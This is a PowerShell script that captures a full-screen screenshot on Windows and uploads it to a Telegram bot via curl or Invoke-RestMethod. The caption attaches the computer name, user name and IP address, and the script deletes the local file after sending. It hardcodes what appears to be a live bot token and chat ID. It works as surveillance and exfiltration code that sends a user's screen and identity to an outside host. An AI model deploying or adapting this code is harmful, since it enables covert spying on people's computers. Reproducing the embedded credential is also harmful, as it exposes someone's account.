# ===========================================
# SIMPLE SCREENSHOT CAPTURE & SEND TO TELEGRAM
# ===========================================

# CONFIGURATION - CHANGE THESE!
$BotToken = "8160534358:AAGKwhDjIS1xGFUCSBD7zU2pBH-YnfvKV_w"
$ChatID = "2146236602"

# ===========================================
# CAPTURE SCREENSHOT
# ===========================================
Write-Host "📸 Capturing screenshot..." -ForegroundColor Yellow

# Create temp folder
$tempFolder = "$env:TEMP\TelegramSS"
if (-not (Test-Path $tempFolder)) {
    New-Item -ItemType Directory -Path $tempFolder -Force | Out-Null
}

# Generate filename with timestamp
$timestamp = Get-Date -Format "yyyyMMdd_HHmmss"
$screenshotPath = "$tempFolder\ss_$timestamp.png"

# Take screenshot
Add-Type -AssemblyName System.Windows.Forms
Add-Type -AssemblyName System.Drawing

$screen = [System.Windows.Forms.SystemInformation]::VirtualScreen
$bitmap = New-Object System.Drawing.Bitmap $screen.Width, $screen.Height
$graphics = [System.Drawing.Graphics]::FromImage($bitmap)
$graphics.CopyFromScreen($screen.X, $screen.Y, 0, 0, $bitmap.Size)

# Save screenshot
$bitmap.Save($screenshotPath, [System.Drawing.Imaging.ImageFormat]::Png)
$graphics.Dispose()
$bitmap.Dispose()

Write-Host "✅ Screenshot saved: $screenshotPath" -ForegroundColor Green

# ===========================================
# SEND TO TELEGRAM
# ===========================================
Write-Host "📤 Sending to Telegram..." -ForegroundColor Yellow

# Create caption with computer info
$computerName = $env:COMPUTERNAME
$userName = $env:USERNAME
$ipAddress = (Test-Connection -ComputerName (hostname) -Count 1).IPv4Address.IPAddressToString
$caption = "🖥️ Screenshot from $computerName`n👤 User: $userName`n📍 IP: $ipAddress`n⏰ Time: $(Get-Date -Format 'dd-MM-yyyy HH:mm:ss')"

try {
    # Method 1: Using curl (simpler)
    $curlCommand = @"
curl -s -X POST https://api.telegram.org/bot$BotToken/sendPhoto \
  -F chat_id="$ChatID" \
  -F caption="$caption" \
  -F photo=@"$screenshotPath"
"@
    
    # Execute curl command
    $result = Invoke-Expression $curlCommand | ConvertFrom-Json
    
    if ($result.ok -eq $true) {
        Write-Host "✅ Screenshot sent successfully to Telegram!" -ForegroundColor Green
        Write-Host "   Message ID: $($result.result.message_id)" -ForegroundColor Cyan
        
        # Optional: Delete local file after sending
        Remove-Item $screenshotPath -Force
        Write-Host "🗑️ Local file deleted" -ForegroundColor Gray
    } else {
        Write-Host "❌ Telegram API error: $($result.description)" -ForegroundColor Red
    }
}
catch {
    Write-Host "❌ Error sending to Telegram: $($_.Exception.Message)" -ForegroundColor Red
    
    # Try alternative method if first fails
    Write-Host "🔄 Trying alternative method..." -ForegroundColor Yellow
    
    try {
        # Alternative method using Invoke-RestMethod
        $fileBytes = [System.IO.File]::ReadAllBytes($screenshotPath)
        $fileEnc = [System.Text.Encoding]::GetEncoding('ISO-8859-1').GetString($fileBytes)
        $boundary = [System.Guid]::NewGuid().ToString()
        
        $bodyLines = @(
            "--$boundary",
            "Content-Disposition: form-data; name=`"chat_id`"",
            "",
            "$ChatID",
            "--$boundary",
            "Content-Disposition: form-data; name=`"caption`"",
            "",
            "$caption",
            "--$boundary",
            "Content-Disposition: form-data; name=`"photo`"; filename=`"$(Split-Path $screenshotPath -Leaf)`"",
            "Content-Type: image/png",
            "",
            $fileEnc,
            "--$boundary--"
        )
        
        $body = $bodyLines -join "`r`n"
        $uri = "https://api.telegram.org/bot$BotToken/sendPhoto"
        
        $response = Invoke-RestMethod -Uri $uri -Method Post `
            -ContentType "multipart/form-data; boundary=$boundary" `
            -Body ([System.Text.Encoding]::UTF8.GetBytes($body))
        
        Write-Host "✅ Screenshot sent via alternative method!" -ForegroundColor Green
        Remove-Item $screenshotPath -Force
    }
    catch {
        Write-Host "❌ Both methods failed. Screenshot saved at: $screenshotPath" -ForegroundColor Red
    }
}

# ===========================================
# DONE
# ===========================================
Write-Host ""
Write-Host "🎯 Script execution completed!" -ForegroundColor Cyan
